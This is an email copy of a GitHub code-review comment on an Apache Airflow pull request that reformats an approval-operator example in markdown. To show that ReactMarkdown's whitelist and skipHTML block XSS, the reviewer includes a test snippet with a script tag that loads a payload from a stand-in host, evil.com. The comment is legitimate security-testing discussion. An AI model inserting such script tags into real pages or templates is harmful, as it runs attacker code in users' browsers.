Re: [PR] Update HITL example to use markdown syntax [airflow]

Fri, 08 Aug 2025 01:56:51 -0700 


guan404ming commented on code in PR #54166:
URL: https://github.com/apache/airflow/pull/54166#discussion_r2262352117


##########
providers/standard/src/airflow/providers/standard/example_dags/example_hitl_operator.py:
##########
@@ -125,10 +125,11 @@ def notify(self, context: Context) -> None:
         task_id="valid_input_and_options",
         subject="Are the following input and options valid?",
         body="""
-        Input: {{ 
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
-        Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] 
}}
-        Multiple Options: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
-        Timeout Option: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+**Collected Information**
+- Input: {{ 
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
+- Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Multiple Options: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Timeout Option: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}

Review Comment:
   > We also have certain protections in the frontend, such as using a 
component whitelist in 
[ReactMarkdown.tsx](https://github.com/apache/airflow/blob/main/airflow-core/src/airflow/ui/src/components/ReactMarkdown.tsx)
 and passing skipHTML to prevent XSS.
   
   <img width="1023" height="256" alt="image" 
src="https://github.com/user-attachments/assets/b7a4fdf7-7790-4c5d-8600-ff2af2014b76";
 />
   
   ```
   valid_input_and_options = ApprovalOperator(
           task_id="valid_input_and_options",
           subject="Are the following input and options valid?",
           body="""
   * Input: {{ task_instance.xcom_pull(task_ids='wait_for_input', 
key='return_value')["params_input"]["information"] }}
   * Option: {{ task_instance.xcom_pull(task_ids='wait_for_option', 
key='return_value')["chosen_options"] }}
   ## Hi XSS
   
   <script src="evil.com/payload"></script>
           """,
           defaults="Reject",
           execution_timeout=datetime.timedelta(minutes=1),
       )
   ```
   
   
   Since we got whitelist in 
[ReactMarkdown.tsx](https://github.com/apache/airflow/blob/main/airflow-core/src/airflow/ui/src/components/ReactMarkdown.tsx),
 it would only render accepted tags for formatting. Also, we pass `skipHTML` 
which would ignore HTML in markdown completely see [react-markdown 
implementation](https://github.com/search?q=repo%3Aremarkjs%2Freact-markdown%20skipHTML&type=code).
 IMHO, it would not directly result in an HTML script tag theoretically or in 
manual tests above.
   



-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to